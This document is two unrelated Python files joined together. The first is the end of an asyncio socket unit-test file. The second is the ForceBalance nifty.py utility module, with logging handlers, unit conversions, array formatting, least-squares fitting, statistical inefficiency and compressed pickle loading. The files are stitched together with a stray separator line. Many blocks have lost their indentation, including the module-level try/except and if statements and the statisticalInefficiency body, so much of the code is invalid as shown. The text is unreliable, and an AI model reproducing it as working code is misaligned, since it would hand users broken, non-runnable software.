        sock = self.make_socket()
        with self.assertRaisesRegex(TypeError,
                                    "count must be a positive integer"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))

    def test_negative_count(self):
        sock = self.make_socket()
        with self.assertRaisesRegex(ValueError,
                                    "count must be a positive integer"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))

    def test_notint_offset(self):
        sock = self.make_socket()
        with self.assertRaisesRegex(TypeError,
                                    "offset must be a non-negative integer"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))

    def test_negative_offset(self):
        sock = self.make_socket()
        with self.assertRaisesRegex(ValueError,
                                    "offset must be a non-negative integer"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
    """Tests for base_events._set_nodelay()."""

    def check_set_nodelay(self, sock):
        # TCP_NODELAY starts off; _set_nodelay must switch it on.
        opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
        self.assertFalse(opt)

        base_events._set_nodelay(sock)

        opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
        self.assertTrue(opt)

    @unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
                         'need socket.TCP_NODELAY')
    def test_set_nodelay(self):
        # Works on a blocking socket...
        sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
                             proto=socket.IPPROTO_TCP)
        with sock:
            self.check_set_nodelay(sock)

        # ...and on a non-blocking one.
        sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
                             proto=socket.IPPROTO_TCP)
        with sock:
            sock.setblocking(False)
            self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
nifty.py | """@package forcebalance.nifty Nifty functions, intended to be imported by any module within ForceBalance.
Table of Contents:
- I/O formatting
- Math: Variable manipulation, linear algebra, least squares polynomial fitting
- Pickle: Expand Python's own pickle to accommodate writing XML etree objects
- Commands for submitting things to the Work Queue
- Various file and process management functions
- Development stuff (not commonly used)
Named after the mighty Sniffy Handy Nifty (King Sniffy)
@author Lee-Ping Wang
@date 2018-03-10
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import filecmp
import itertools
import os
import re
import shutil
import sys
from select import select
import numpy as np
from numpy.linalg import multi_dot
# For Python 3 compatibility
try:
from itertools import zip_longest as zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
import threading
from pickle import Pickler, Unpickler
import tarfile
import time
import subprocess
import math
import six # For six.string_types
from subprocess import PIPE
from collections import OrderedDict, defaultdict
#================================#
# Set up the logger #
#================================#
if "forcebalance" in __name__:
# If this module is part of ForceBalance, use the package level logger
from .output import *
package="ForceBalance"
else:
from logging import *
# Define two handlers that don't print newline characters at the end of each line
class RawStreamHandler(StreamHandler):
    """
    Exactly like StreamHandler, except no newline character is printed at the end of each message.
    This is done in order to ensure functions in molecule.py and nifty.py work consistently
    across multiple packages.
    """
    def __init__(self, stream = sys.stdout):
        # Default to stdout (StreamHandler's own default is stderr).
        super(RawStreamHandler, self).__init__(stream)

    def emit(self, record):
        # Write the raw message verbatim — no terminator — and flush
        # immediately so partial lines appear promptly.
        message = record.getMessage()
        self.stream.write(message)
        self.flush()
class RawFileHandler(FileHandler):
    """
    Exactly like FileHandler, except no newline character is printed at the end of each message.
    This is done in order to ensure functions in molecule.py and nifty.py work consistently
    across multiple packages.
    """
    def __init__(self, *args, **kwargs):
        super(RawFileHandler, self).__init__(*args, **kwargs)

    def emit(self, record):
        # FileHandler may open its stream lazily; ensure it exists first.
        if self.stream is None:
            self.stream = self._open()
        # Write the raw message verbatim — no terminator — then flush.
        message = record.getMessage()
        self.stream.write(message)
        self.flush()
if "geometric" in __name__:
# This ensures logging behavior is consistent with the rest of geomeTRIC
logger = getLogger(__name__)
logger.setLevel(INFO)
package="geomeTRIC"
else:
logger = getLogger("NiftyLogger")
logger.setLevel(INFO)
handler = RawStreamHandler()
logger.addHandler(handler)
if __name__ == "__main__":
package = "LPW-nifty.py"
else:
package = __name__.split('.')[0]
try:
import bz2
HaveBZ2 = True
except ImportError:
logger.warning("bz2 module import failed (used in compressing or decompressing pickle files)\n")
HaveBZ2 = False
try:
import gzip
HaveGZ = True
except ImportError:
logger.warning("gzip module import failed (used in compressing or decompressing pickle files)\n")
HaveGZ = False
## Boltzmann constant
kb = 0.0083144100163
## Q-Chem to GMX unit conversion for energy
eqcgmx = 2625.5002
## Q-Chem to GMX unit conversion for force
fqcgmx = -49621.9
# Conversion factors
bohr2ang = 0.529177210
ang2bohr = 1.0 / bohr2ang
au2kcal = 627.5096080306
kcal2au = 1.0 / au2kcal
au2kj = 2625.5002
kj2au = 1.0 / au2kj
grad_au2gmx = 49614.75960959161
grad_gmx2au = 1.0 / grad_au2gmx
# Gradient units
au2evang = 51.42209166566339
evang2au = 1.0 / au2evang
#=========================#
# I/O formatting #
#=========================#
# These functions may be useful someday but I have not tested them
# def bzip2(src):
# dest = src+'.bz2'
# if not os.path.exists(src):
# logger.error('File to be compressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Archive to be created already exists')
# raise RuntimeError
# with open(src, 'rb') as input:
# with bz2.BZ2File(dest, 'wb', compresslevel=9) as output:
# copyfileobj(input, output)
# os.remove(input)
# def bunzip2(src):
# dest = re.sub('\.bz2$', '', src)
# if not os.path.exists(src):
# logger.error('File to be decompressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Target path for decompression already exists')
# raise RuntimeError
# with bz2.BZ2File(src, 'rb', compresslevel=9) as input:
# with open(dest, 'wb') as output:
# copyfileobj(input, output)
# os.remove(input)
def pvec1d(vec1d, precision=1, format="e", loglevel=INFO):
    """Log a 1-D vector, one formatted element at a time, then a newline.

    @param[in] vec1d a 1-D vector
    @param[in] precision number of digits after the decimal point
    @param[in] format printf conversion character ('e', 'f', ...)
    @param[in] loglevel logging level passed to logger.log
    """
    arr = np.array(vec1d)
    # Build the element format once, e.g. "% .1e ".
    fmt = "%% .%i%s " % (precision, format)
    for element in arr:
        logger.log(loglevel, fmt % element)
    logger.log(loglevel, '\n')
def astr(vec1d, precision=4):
    """ Write an array to a string so we can use it to key a dictionary. """
    # Element format, e.g. "% .4e "; elements are joined with single spaces.
    fmt = "%% .%ie " % precision
    return ' '.join(fmt % value for value in vec1d)
def pmat2d(mat2d, precision=1, format="e", loglevel=INFO):
    """Log a 2-D array row by row; each row is followed by a newline.

    @param[in] mat2d a 2-D array
    @param[in] precision number of digits after the decimal point
    @param[in] format printf conversion character ('e', 'f', ...)
    @param[in] loglevel logging level passed to logger.log
    """
    arr = np.array(mat2d)
    fmt = "%% .%i%s " % (precision, format)
    for r in range(arr.shape[0]):
        for c in range(arr.shape[1]):
            logger.log(loglevel, fmt % arr[r][c])
        logger.log(loglevel, '\n')
def grouper(iterable, n):
    """Collect data into fixed-length chunks or blocks.

    grouper('ABCDEFG', 3) -> [['A','B','C'], ['D','E','F'], ['G']]

    NOTE: items that are None are dropped — zip_longest's padding value is
    None, and genuine None entries cannot be told apart from the padding.
    """
    it = iter(iterable)
    chunks = zip_longest(*([it] * n))
    return [[item for item in chunk if item is not None] for chunk in chunks]
def encode(l):
    """Run-length encode a sequence into [[count, value], ...] pairs."""
    runs = []
    for value, group in itertools.groupby(l):
        runs.append([sum(1 for _ in group), value])
    return runs
def segments(e):
    """From run-length-encoded input (see encode), return (start, end)
    half-open index pairs covering the runs whose value equals 1."""
    spans = []
    pos = 0
    for count, value in e:
        if value == 1:
            spans.append((pos, pos + count))
        pos += count
    return spans
def commadash(l):
    """Render a list of 0-based indices as a compact 1-based string,
    e.g. [0, 1, 2, 4] -> '1-3,5'.  Returns '(empty)' for an empty list."""
    ordered = sorted(l)
    if not ordered:
        return "(empty)"
    # Sentinel one past the last index terminates the final run.
    ordered.append(ordered[-1] + 1)
    membership = [idx in ordered for idx in range(ordered[-1])]
    pieces = []
    for lo, hi in segments(encode(membership)):
        if hi - 1 > lo:
            pieces.append('%i-%i' % (lo + 1, hi))
        else:
            pieces.append('%i' % (lo + 1))
    return ','.join(pieces)
def uncommadash(s):
    """Invert commadash: turn a string like '27-31,88-91,100' into a sorted
    0-based list like [26, 27, 28, 29, 30, 87, 88, 89, 90, 99].

    @param[in] s Comma-separated string of 1-based indices and dashed ranges
    @return L List of 0-based integer indices
    Raises RuntimeError on malformed, duplicated, or out-of-order input
    (matching the original interface).
    """
    L = []
    try:
        for w in s.split(','):
            ws = w.split('-')
            a = int(ws[0]) - 1
            if len(ws) == 1:
                b = int(ws[0])
            elif len(ws) == 2:
                b = int(ws[1])
            else:
                logger.warning("Dash-separated list cannot exceed length 2\n")
                # Bug fix: the original used a bare `raise` with no active
                # exception, which only worked by accident (Python raises
                # RuntimeError for it).  Raise an explicit error instead.
                raise ValueError(w)
            if a < 0 or b <= 0 or b <= a:
                if a < 0 or b <= 0:
                    logger.warning("Items in list cannot be zero or negative: %d %d\n" % (a, b))
                else:
                    logger.warning("Second number cannot be smaller than first: %d %d\n" % (a, b))
                raise ValueError(w)
            newL = range(a, b)
            if any(i in L for i in newL):
                logger.warning("Duplicate entries found in list\n")
                raise ValueError(w)
            L += newL
        if sorted(L) != L:
            logger.warning("List is out of order\n")
            raise ValueError(s)
    # Narrowed from a bare `except:` — only the errors this parser can
    # produce (bad int conversion, our own ValueError, non-string input).
    except (ValueError, AttributeError):
        logger.error('Invalid string for converting to list of numbers: %s\n' % s)
        raise RuntimeError
    return L
def natural_sort(l):
    """ Return a natural sorted list. """
    def tokenize(key):
        # Split into digit and non-digit runs; digit runs compare
        # numerically, everything else compares case-insensitively.
        parts = re.split('([0-9]+)', key)
        return [int(p) if p.isdigit() else p.lower() for p in parts]
    return sorted(l, key=tokenize)
def printcool(text,sym="#",bold=False,color=2,ansi=None,bottom='-',minwidth=50,center=True,sym2="="):
    """Cool-looking printout for slick formatting of output.

    @param[in] text The string that the printout is based upon.  This function
    will print out the string, ANSI-colored and enclosed in the symbol
    for example:\n
    <tt> ################# </tt>\n
    <tt> ### I am cool ### </tt>\n
    <tt> ################# </tt>

    @param[in] sym The surrounding symbol\n
    @param[in] bold Whether to use bold print

    @param[in] color The ANSI color:\n
    1 red\n
    2 green\n
    3 yellow\n
    4 blue\n
    5 magenta\n
    6 cyan\n
    7 white

    @param[in] bottom The symbol for the bottom bar

    @param[in] minwidth The minimum width for the box, if the text is very short
    then we insert the appropriate number of padding spaces

    @return bar The bottom bar is returned for the user to print later, e.g. to mark off a 'section'
    """
    def newlen(l):
        # Visible length: strip ANSI escape sequences before counting.
        return len(re.sub(r"\x1b\[[0-9;]*m","",l))
    text = text.split('\n')
    width = max(minwidth,max([newlen(line) for line in text]))
    bar = ''.join([sym2 for i in range(width + 6)])
    bar = sym + bar + sym
    #bar = ''.join([sym for i in range(width + 8)])
    logger.info('\r'+bar + '\n')
    for ln, line in enumerate(text):
        # 'center' may be a per-line list or a single flag for all lines.
        if type(center) is list: c1 = center[ln]
        else: c1 = center
        if c1:
            padleft = ' ' * (int((width - newlen(line))/2))
        else:
            padleft = ''
        padright = ' '* (width - newlen(line) - len(padleft))
        if ansi is not None:
            # Explicit ANSI code overrides the 'color'/'bold' arguments.
            ansi = str(ansi)
            logger.info("%s| \x1b[%sm%s " % (sym, ansi, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
        elif color is not None:
            if color == 0 and bold:
                logger.info("%s| \x1b[1m%s " % (sym, padleft) + line + " %s\x1b[0m |%s\n" % (padright, sym))
            elif color == 0:
                logger.info("%s| %s " % (sym, padleft)+line+" %s |%s\n" % (padright, sym))
            else:
                logger.info("%s| \x1b[%s9%im%s " % (sym, bold and "1;" or "", color, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
            # if color == 3 or color == 7:
            #     print "%s\x1b[40m\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
            # else:
            #     print "%s\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
        else:
            warn_press_key("Inappropriate use of printcool")
    logger.info(bar + '\n')
    botbar = ''.join([bottom for i in range(width + 8)])
    return botbar + '\n'
def printcool_dictionary(Dict,title="Dictionary Keys : Values",bold=False,color=2,keywidth=25,topwidth=50,center=True,leftpad=0):
    """See documentation for printcool; this is a nice way to print out keys/values in a dictionary.

    The keys in the dictionary are sorted before printing out.

    @param[in] Dict The dictionary to be printed
    @param[in] title The title of the printout
    @param[in] keywidth Column width that keys are left-justified into
    @param[in] leftpad Number of spaces to prepend to every line
    @return None (output goes through the logger)
    """
    if Dict is None: return
    bar = printcool(title,bold=bold,color=color,minwidth=topwidth,center=center)
    def magic_string(str):
        # Left-justify the key into a fixed-width field.  This replaces the
        # previous eval()-based string construction, which was a needless
        # code-injection hazard and broke on keys containing backslashes.
        return '%-*s' % (keywidth, str)
    # OrderedDict keeps its insertion order; any other mapping is printed
    # with sorted keys.  Entries whose value is None are skipped.
    if isinstance(Dict, OrderedDict):
        logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in Dict if Dict[key] is not None]))
    else:
        logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in sorted([i for i in Dict]) if Dict[key] is not None]))
    logger.info("\n%s" % bar)
#===============================#
#| Math: Variable manipulation |#
#===============================#
def isint(word):
    """ONLY matches integers! If you have a decimal point? None shall pass!

    @param[in] word String (for instance, '123', '153.0', '2.', '-354')
    @return answer Truthy (a match object) iff the string is an integer
    (only +/- sign followed by digits); falsy otherwise
    """
    try:
        text = str(word)
    except:
        return False
    # Optional sign, then one or more digits, and nothing else.
    return re.match('^[-+]?[0-9]+$', text)
def isfloat(word):
    """Check whether a string represents a number (integer, decimal, or scientific notation).

    CAUTION - this will also match an integer.

    @param[in] word Input that is converted to a string and tested (e.g. '123', '153.0', '2.', '-354')
    @return True if the string parses as a number, False otherwise
    """
    try:
        word = str(word)
    except Exception:
        return False
    if len(word) == 0: return False
    # Accepts Fortran-style exponents (D/d) in addition to E/e.
    return bool(re.match(r'^[-+]?[0-9]*\.?[0-9]*([eEdD][-+]?[0-9]+)?$',word))
def isdecimal(word):
    """Check whether a string is a number carrying a decimal point.

    See isint and isfloat; a decimal is anything that parses as a float
    but not as a plain integer.

    @param[in] word String (for instance, '123', '153.0', '2.', '-354')
    @return answer Boolean which specifies whether the string is a number with a decimal point
    """
    try:
        word = str(word)
    except:
        return False
    if isint(word):
        return False
    return isfloat(word)
def floatornan(word):
    """Convert a string to float, substituting a big number for non-numeric values (e.g. NaN).

    @param[in] word The string to be converted
    @return answer The string converted to a float; if not parseable as a float, return 1e10
    """
    big = 1e10
    if isfloat(word):
        return float(word)
    else:
        # Bug fix: the format string takes two values (the word and the
        # substitute); previously only 'big' was supplied, which raised
        # TypeError whenever this branch was reached.
        logger.info("Setting %s to % .1e\n" % (word, big))
        return big
def col(vec):
    """Reshape any list, array, or matrix into a single-column 2D array.

    @param[in] vec The input data to be made into a column
    @return A 2D numpy array with exactly one column
    """
    return np.reshape(np.array(vec), (-1, 1))
def row(vec):
    """Reshape any list, array, or matrix into a single-row 2D array.

    @param[in] vec The input vector that is to be made into a row
    @return answer A 1-row 2D array
    """
    return np.reshape(np.array(vec), (1, -1))
def flat(vec):
    """Flatten any list, array, or matrix into a one-dimensional array.

    @param[in] vec The data to be flattened
    @return answer The flattened data
    """
    return np.array(vec).ravel()
def est124(val):
    """Round a positive value to the closest number of the form {1,2,4}e+xx in log space.

    @param[in] val A positive floating point value
    @return The nearest fac*10**n with fac in {1, 2, 4, 10}
    """
    logv = np.log10(val)
    expo = math.floor(logv)
    frac = logv - expo
    # Log-space midpoints between the successive candidates 1, 2, 4 and 10.
    log1, log2, log4, log10 = 0.0, 0.3010299956639812, 0.6020599913279624, 1.0
    cutoffs = [(0.5 * (log1 + log2), 1.0),
               (0.5 * (log2 + log4), 2.0),
               (0.5 * (log4 + log10), 4.0)]
    fac = 10.0
    for cut, candidate in cutoffs:
        if frac < cut:
            fac = candidate
            break
    return fac * 10 ** expo
def est1234568(val):
    """Round a positive value to the closest number of the form {1,2,3,4,5,6,8}e+xx in log space.

    Like est124 but with a denser set of mantissas; sevens and nines are
    deliberately excluded ("call me a numberist").

    @param[in] val A positive floating point value
    @return The nearest fac*10**n with fac in {1, 2, 3, 4, 5, 6, 8, 10}
    """
    logv = np.log10(val)
    expo = math.floor(logv)
    frac = logv - expo
    # Candidate mantissas; 10 closes out the decade.  The original's
    # hard-coded constants for log10(2) and log10(4) equal np.log10 here.
    mantissas = [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0]
    logs = [0.0, 0.3010299956639812, np.log10(3), 0.6020599913279624,
            np.log10(5), np.log10(6), np.log10(8), 1.0]
    fac = 10.0
    for i in range(len(mantissas) - 1):
        # Pick the first candidate whose log-space midpoint we fall below.
        if frac < 0.5 * (logs[i] + logs[i + 1]):
            fac = mantissas[i]
            break
    return fac * 10 ** expo
def monotonic(arr, start, end):
    """Force 'arr' to decrease monotonically from index 'start' to 'end' (in place).

    Whenever a new minimum is found, the intervening entries are replaced by a
    linear interpolation between the previous minimum and the new one.  Works
    forward (end > start) or backward (end < start).
    """
    lowest = arr[start]
    anchor = start
    if end > start:
        for i in range(start + 1, end):
            if arr[i] < lowest:
                # Interpolate from the previous minimum down to this new one.
                arr[anchor:i + 1] = np.linspace(lowest, arr[i], i - anchor + 1)
                lowest = arr[i]
                anchor = i
    if end < start:
        for i in range(start - 1, end - 1, -1):
            if arr[i] < lowest:
                arr[i:anchor + 1] = np.linspace(arr[i], lowest, anchor - i + 1)
                lowest = arr[i]
                anchor = i
def monotonic_decreasing(arr, start=None, end=None, verbose=False):
    """
    Return the indices of an array corresponding to strictly monotonic
    decreasing behavior.

    Parameters
    ----------
    arr : numpy.ndarray
        Input array
    start : int
        Starting index (first element if None)
    end : int
        Ending index (last element if None)
    verbose : bool
        If True, log each index as it is included or excluded.

    Returns
    -------
    indices : numpy.ndarray
        Selected indices
    """
    start = 0 if start is None else start
    end = len(arr) - 1 if end is None else end
    floor = arr[start]
    keep = [start]
    if verbose: logger.info("Starting @ %i : %.6f\n" % (start, arr[start]))
    # Walk forward (excluding 'end') or backward (including 'end'),
    # matching the original loop bounds.
    if end > start:
        span = range(start + 1, end)
    elif end < start:
        span = range(start - 1, end - 1, -1)
    else:
        span = []
    for i in span:
        if arr[i] < floor:
            floor = arr[i]
            keep.append(i)
            if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
        else:
            if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
    return np.array(keep)
#====================================#
#| Math: Vectors and linear algebra |#
#====================================#
def orthogonalize(vec1, vec2):
    """Project out of vec1 the component parallel to vec2.

    @param[in] vec1 The projectee (i.e. output is some modified version of vec1)
    @param[in] vec2 The projector (component subtracted out from vec1 is parallel to this)
    @return answer A copy of vec1 but with the vec2-component projected out.
    """
    unit2 = vec2 / np.linalg.norm(vec2)
    overlap = np.dot(vec1, unit2)
    return vec1 - overlap * unit2
def invert_svd(X,thresh=1e-12):
    """
    Invert a matrix using singular value decomposition.

    Singular values whose magnitude does not exceed 'thresh' are zeroed
    instead of inverted, so near-null directions do not blow up the result.

    @param[in] X The 2-D NumPy array containing the matrix to be inverted
    @param[in] thresh The SVD threshold; singular values below this are not inverted but set to zero
    @return Xt The 2-D NumPy array containing the inverted matrix
    """
    u, s, vh = np.linalg.svd(X, full_matrices=0)
    # Invert each singular value above the threshold, zero the rest.
    sinv = np.array([1. / sv if abs(sv) > thresh else 0.0 for sv in s])
    # Reassemble: X^+ = V * diag(1/s) * U^T
    Xt = multi_dot([vh.T, np.diag(sinv), u.T])
    return Xt
#==============================#
#| Linear least squares |#
#==============================#
def get_least_squares(x, y, w = None, thresh=1e-12):
    """
    Weighted linear least squares via the Moore-Penrose pseudoinverse.

    The input x is the design matrix: one row per data point, one column per
    fit coefficient (e.g. powers of x for a polynomial fit):

    @code
     __                    __
    |                        |
    | 1 (x0) (x0)^2 (x0)^3   |
    | 1 (x1) (x1)^2 (x1)^3   |
    | 1 (x2) (x2)^2 (x2)^3   |
    | 1 (x3) (x3)^2 (x3)^3   |
    | 1 (x4) (x4)^2 (x4)^3   |
    |__                    __|
    @endcode

    @param[in] x (2-D array) The design matrix (a 1-D input is treated as one column)
    @param[in] y (array) An array of Y-values (only used in getting the least squares coefficients)
    @param[in] w (array) An array of weights, hopefully normalized to one.
    @param[in] thresh (unused here; kept for interface stability)
    @param[out] Beta The least-squares coefficients
    @param[out] Hat The hat matrix that takes linear combinations of data y-values to give fitted y-values (weights)
    @param[out] yfit The fitted y-values
    @param[out] MPPI The Moore-Penrose pseudoinverse (multiply by Y to get least-squares coefficients, multiply by dY/dk to get derivatives of least-squares coefficients)
    """
    # X is a 'tall' matrix.
    X = np.array(x)
    if len(X.shape) == 1:
        X = X[:,np.newaxis]
    Y = col(y)
    n_x = X.shape[0]
    n_fit = X.shape[1]
    if n_fit > n_x:
        logger.warning("Argh? It seems like this problem is underdetermined!\n")
    # Build the weight matrix.
    if w is not None:
        if len(w) != n_x:
            # Bug fix: both counts must be supplied to the format string as a
            # tuple; previously n_x was passed as a second argument to
            # warn_press_key, so the %-format raised TypeError.
            warn_press_key("The weight array length (%i) must be the same as the number of 'X' data points (%i)!" % (len(w), n_x))
        w /= np.mean(w)
        WH = np.diag(w**0.5)
    else:
        WH = np.eye(n_x)
    # Make the Moore-Penrose Pseudoinverse.
    # if n_fit == n_x:
    #     MPPI = np.linalg.inv(WH*X)
    # else:
    # This resembles the formula (X'WX)^-1 X' W^1/2
    MPPI = np.linalg.pinv(np.dot(WH, X))
    Beta = multi_dot([MPPI, WH, Y])
    Hat = multi_dot([WH, X, MPPI])
    yfit = flat(np.dot(Hat, Y))
    # Return three things: the least-squares coefficients, the hat matrix (turns y into yfit), and yfit
    # We could get these all from MPPI, but I might get confused later on, so might as well do it here :P
    return np.array(Beta).flatten(), np.array(Hat), np.array(yfit).flatten(), np.array(MPPI)
#===========================================#
#| John's statisticalInefficiency function |#
#===========================================#
def statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
"""
Compute the (cross) statistical inefficiency of (two) timeseries.
Notes
The same timeseries can be used for both A_n and B_n to get the autocorrelation statistical inefficiency.
The fast method described in Ref [1] is used to compute g.
References
[1] J. D. Chodera, W. C. Swope, J. W. Pitera, C. Seok, and K. A. Dill. Use of the weighted
histogram analysis method for the analysis of simulated and parallel tempering simulations.
JCTC 3(1):26-41, 2007.
Examples
Compute statistical inefficiency of timeseries data with known correlation time.
>>> import timeseries
>>> A_n = timeseries.generateCorrelatedTimeseries(N=100000, tau=5.0)
>>> g = statisticalInefficiency(A_n, fast=True)
@param[in] A_n (required, numpy array) - A_n[n] is nth value of
timeseries A. Length is deduced from vector.
@param[in] B_n (optional, numpy array) - B_n[n] is nth value of
timeseries B. Length is deduced from vector. If supplied, the
cross-correlation of timeseries A and B will be estimated instead of
the autocorrelation of timeseries A.
@param[in] fast (optional, boolean) - if True, will use faster (but
less accurate) method to estimate correlation time, described in
Ref. [1] (default: False)
@param[in] mintime (optional, int) - minimum amount of correlation
function to compute (default: 3) The algorithm terminates after
computing the correlation time out to mintime when the correlation
function furst goes negative. Note that this time may need to be
increased if there is a strong initial negative peak in the
correlation function.
@return g The estimated statistical inefficiency (equal to 1 + 2
tau, where tau is the correlation time). We enforce g >= 1.0.
"""
# Create numpy copies of input arguments.
A_n = np.array(A_n)
if B_n is not None:
B_n = np.array(B_n)
else:
B_n = np.array(A_n)
# Get the length of the timeseries.
N = A_n.shape[0]
# Be sure A_n and B_n have the same dimensions.
if A_n.shape != B_n.shape:
logger.error('A_n and B_n must have same dimensions.\n')
raise ParameterError
# Initialize statistical inefficiency estimate with uncorrelated value.
g = 1.0
# Compute mean of each timeseries.
mu_A = A_n.mean()
mu_B = B_n.mean()
# Make temporary copies of fluctuation from mean.
dA_n = A_n.astype(np.float64) - mu_A
dB_n = B_n.astype(np.float64) - mu_B
# Compute estimator of covariance of (A,B) using estimator that will ensure C(0) = 1.
sigma2_AB = (dA_n * dB_n).mean() # standard estimator to ensure C(0) = 1
# Trap the case where this covariance is zero, and we cannot proceed.
if sigma2_AB == 0:
if warn:
logger.warning('Sample covariance sigma_AB^2 = 0 -- cannot compute statistical inefficiency\n')
return 1.0
# Accumulate the integrated correlation time by computing the normalized correlation time at
# increasing values of t. Stop accumulating if the correlation function goes negative, since
# this is unlikely to occur unless the correlation function has decayed to the point where it
# is dominated by noise and indistinguishable from zero.
t = 1
increment = 1
while t < N-1:
# compute normalized fluctuation correlation function at time t
C = sum( dA_n[0:(N-t)]*dB_n[t:N] + dB_n[0:(N-t)]*dA_n[t:N] ) / (2.0 * float(N-t) * sigma2_AB)
# Terminate if the correlation function has crossed zero and we've computed the correlation
# function at least out to 'mintime'.
if (C <= 0.0) and (t > mintime):
break
# Accumulate contribution to the statistical inefficiency.
g += 2.0 * C * (1.0 - float(t)/float(N)) * float(increment)
# Increment t and the amount by which we increment t.
t += increment
# Increase the interval if "fast mode" is on.
if fast: increment += 1
# g must be at least unity
if g < 1.0: g = 1.0
# Return the computed statistical inefficiency.
return g
def mean_stderr(ts):
    """Return the mean and the correlation-corrected standard error of a time series ts."""
    avg = np.mean(ts)
    # Inflate the naive standard error by the statistical inefficiency.
    err = np.std(ts) * np.sqrt(statisticalInefficiency(ts, warn=False) / len(ts))
    return avg, err
# Slices a 2D array of data by column. The new array is fed into the statisticalInefficiency function.
def multiD_statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
    """Column-wise statistical inefficiency of a 2-D timeseries.

    Each column of A_n (and, if given, the matching column of B_n) is passed
    to statisticalInefficiency; the scalar result is broadcast down that
    column of the returned array.

    @param[in] A_n 2-D array; rows are samples, columns are observables
    @param[in] B_n Optional 2-D array of the same shape for cross-correlation
    @param[in] fast/mintime/warn Passed through to statisticalInefficiency
    @return 2-D array of shape A_n.shape filled column-wise with g values
    """
    n_row = A_n.shape[0]
    n_col = A_n.shape[-1]
    multiD_sI = np.zeros((n_row, n_col))
    # Loop variable renamed from 'col', which shadowed the module-level
    # col() helper function.
    for icol in range(n_col):
        if B_n is None:
            multiD_sI[:,icol] = statisticalInefficiency(A_n[:,icol], B_n, fast, mintime, warn)
        else:
            multiD_sI[:,icol] = statisticalInefficiency(A_n[:,icol], B_n[:,icol], fast, mintime, warn)
    return multiD_sI
#========================================#
#| Loading compressed pickles |#
#========================================#
def lp_dump(obj, fnm, protocol=0):
    """ Write an object to a compressed pickle file specified by the path.

    Uses gzip if available, else bz2, else an uncompressed pickle.  A symbolic
    link at the destination is removed before writing.

    @param[in] obj      The object to be pickled
    @param[in] fnm      Destination file name (overwritten if it exists)
    @param[in] protocol Pickle protocol number (default 0, the text protocol)
    """
    # Safeguard against overwriting files? Nah.
    # if os.path.exists(fnm):
    #     logger.error("lp_dump cannot write to an existing path")
    #     raise IOError
    if os.path.islink(fnm):
        logger.warning("Trying to write to a symbolic link %s, removing it first\n" % fnm)
        os.unlink(fnm)
    if HaveGZ:
        f = gzip.GzipFile(fnm, 'wb')
    elif HaveBZ2:
        f = bz2.BZ2File(fnm, 'wb')
    else:
        f = open(fnm, 'wb')
    # Close the handle even if pickling raises (fixes a file-handle leak
    # on serialization errors).
    try:
        Pickler(f, protocol).dump(obj)
    finally:
        f.close()
def lp_load(fnm):
    """ Read an object from a gzipped, bzipped, or uncompressed pickle file specified by the path. """
    if not os.path.exists(fnm):
        logger.error("lp_load cannot read from a path that doesn't exist (%s)" % fnm)
        raise IOError

    def read_pickle(f):
        # Try the default decoding first; fall back to latin1 so pickles
        # written under Python 2 can still be loaded.
        try:
            answer = Unpickler(f).load()
        except UnicodeDecodeError:
            answer = Unpickler(f, encoding='latin1').load()
        f.close()
        return answer

    def load_uncompress():
        logger.warning("Compressed file loader failed, attempting to read as uncompressed file\n")
        return read_pickle(open(fnm, 'rb'))

    def load_bz2():
        return read_pickle(bz2.BZ2File(fnm, 'rb'))

    def load_gz():
        return read_pickle(gzip.GzipFile(fnm, 'rb'))

    # Try the available compressed loaders in order; the uncompressed
    # reader is the last resort and is allowed to raise.
    loaders = []
    if HaveGZ:
        loaders.append(load_gz)
    if HaveBZ2:
        loaders.append(load_bz2)
    loaders.append(load_uncompress)
    for loader in loaders[:-1]:
        try:
            return loader()
        except:
            continue
    return loaders[-1]()
#==============================#
#| Work Queue stuff |#
#==============================#
# Work Queue (from the CCTools suite) is an optional dependency; if the
# import fails, distributed task execution is simply unavailable.
try:
    import work_queue
except:
    pass
    #logger.warning("Work Queue library import fail (You can't queue up jobs using Work Queue)\n")
# Global variable corresponding to the Work Queue object
WORK_QUEUE = None
# Global variable containing a mapping from target names to Work Queue task IDs
WQIDS = defaultdict(list)
def getWorkQueue():
    """Return the module-level Work Queue object (None until createWorkQueue is called)."""
    # Reading a module global requires no 'global' declaration.
    return WORK_QUEUE
def getWQIds():
    """Return the module-level mapping from target names to Work Queue task IDs."""
    # Reading a module global requires no 'global' declaration.
    return WQIDS
def createWorkQueue(wq_port, debug=True, name=package):
    """Create the global Work Queue object listening on the given port.

    @param[in] wq_port Port number for the Work Queue master to listen on
    @param[in] debug   If True, enable verbose Work Queue debug logging
    @param[in] name    Project name that workers use to locate this master
    """
    global WORK_QUEUE
    if debug:
        work_queue.set_debug_flag('all')
    WORK_QUEUE = work_queue.WorkQueue(port=wq_port)
